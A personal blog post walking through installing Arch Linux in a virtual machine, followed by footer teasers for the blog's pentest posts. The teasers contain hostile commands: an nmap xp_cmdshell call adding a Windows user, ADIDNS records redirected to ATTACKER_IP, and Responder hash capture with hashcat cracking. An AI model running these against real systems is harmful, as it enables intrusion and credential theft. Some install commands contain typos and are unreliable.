Skip to main content

Installing and Configuring Arch Linux

By

We are going to Install Arch Linux from Scratch

Download Arch ISO from official website

Use it via VirutalBox or VMware - give around 2GB of ram & 16gb of disk space

Start the VM
#Check Internet Access
ping archlinux.org

#Set Time & Date
timedatectl set-ntp true
Creating a Partition 

#Check the partitions
fdisk -l 

#Create partition using cfdisk 
cfdisk 

#Create a partition, allocate space & select it as bootable --> Create --> exit
#you can choose to create a swap space if required to hibernate. 

#Creating File System, i choose /dev/sda2 as that's where i am looking to install the file system 
mkfs.ext4 /dev/sda2

#Creating Swap Memory
mkswap /dev/sda1

#Mount the drives
mount /dev/sda2 /mnt
swapon /dev/sda1
Installing Required Tools

pacman -Sy
pacman -S archlinux-keyring
pacstrap -i /mnt base base-devel linux-lts linux-firmware dhcpcd vim nano iputils netctl networkmanager grub
Adding drive UUID to fstab

genfstab -U /mnt >> /mnt/etc/fstab
cat /mnt/etc/fstab

arch-chroot /mnt
Setting up Location & Hostname

ln -sf /usr/share/zoneinfo/Asia/Kolkota /etc/localtime
hwclock --systohc

nano /etc/locale.gen
#uncommnet en_US

locale-gen

nano /etc/hostname 
Elric

nano /etc/hosts
127.0.0.1	localhost
::1		localhost
127.0.1.1	Elric.localdomain Elric

#Create symlink for dhcp service
systemctl enable dhcpcd

#Update password
passwd
Setting up Grub 

grub-install /dev/sda

grub-mkconfig -o /boot/grub/grub.cfg

#Incase of any error or warning: 
Ex: Os-prober will not be executed to detect other bootable partitions
Solution: 
nano/etc/default/grub
at the end of the file uncomment/add GRUB_DISABLE_OS_PROBER=false

#save the file & run below command again; you should not see any erros now
grub-mkconfig -o /boot/grub/grub.cfg
Reboot

#Exit from the current session
exit
umount -R /mnt 
reboot 
Login to Arch as Root/User 

#Check Internet Access
ping google.com

#incase of issues
nano /etc/resolv.conf
nameserver Gateway_IPAddress

#create a normal user
useradd -m -G wheel -s /bin/bash Username

EDITOR=vim visudo
uncomment wheel
Setting up VM Tools

#VMWARE
pacman -S open-vm-tools 

#Virtual Box
pacman -S virtualbox-guest-utils
Installing Required Tools - GUI, audio 

#here i choose xorg,xfce4 and lightdm - you can choose whatever you want- you can get the list from ArchWiki Page  

lihgtdm - Display Manager - Graphical
xfce4 - Desktop Environment

pacman -S pulseaudio pulseaudio-alsa xorg lightdm lightdm-gtk-greeter xfce4

#when you are using a display login manager, it should be started on system start
sudo systemctl enable lightdm
Reboot and you can login to Arch via GUI 
Setting up VMWare Tools

#Login to the VM --> click on VM --> Install VMware Tools
#usually it wont mount automatically
#mount using following commands
mkdir /mnt/cdrom
mount /dev/cdrom /mnt/cdrom
cd /mnt/cdrom

copy vmware.tar file to /tmp
tar -xvf vmware.tar

cd vmware-tools-distirb

#Create init directory
sudo bash 
for x in {0..6}; do mkdir -p /etc/init.d/rc${x}.d; done

#Run below command and Accept all defaults
vmware-install.pl

nano /etc/systemd/system/vmwaretools.service
--------

[Unit]
Description=VMWare Tools Daemon

[Service]
ExecStart=/etc/init.d/vmware-tools start
ExecStop=/etc/init.d/vmware-tools stop
PIDFile=/var/lock/subsys/vmware
TimeoutSec=0
RemainAfterExit=yes
 
[Install]
WantedBy=multi-user.target

------

#Add Vmware Tools to systemctl 
systemctl start vmwaretools.service
systemctl enable vmwaretools.service

 

 

 

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more